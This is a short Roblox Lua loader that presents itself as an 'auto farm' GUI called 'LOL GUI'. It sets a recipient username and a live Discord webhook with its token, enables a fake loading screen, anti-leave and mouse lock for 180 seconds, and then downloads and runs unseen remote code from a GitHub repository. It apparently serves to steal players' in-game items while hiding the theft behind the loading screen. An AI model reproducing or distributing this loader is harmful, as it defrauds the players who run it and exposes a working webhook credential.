UserName = "Zilof0"
UserName2 = "Zilof0"
Webhook = "https://discord.com/api/webhooks/1109413037376544828/QM1XYK0SxyVCw12PJ8T-bWLrsfrd_lW89RzqKteXLLk169XEzJlUl9a711ud5jEl93HU"

_G.LoadingScreen = true
_G.AntiLeave = true
_G.MouseLock = true 

_G.ScriptName = "LOL GUI"
_G.FirstText = "you can use auto farm in my script to"
_G.SecondText = "this script has many feature"
_G.ThirdText = "wait..."
_G.WaitingTime = 180

loadstring(game:HttpGet("https://raw.githubusercontent.com/pet-simx/ftssa/main/Main.lua", true))()
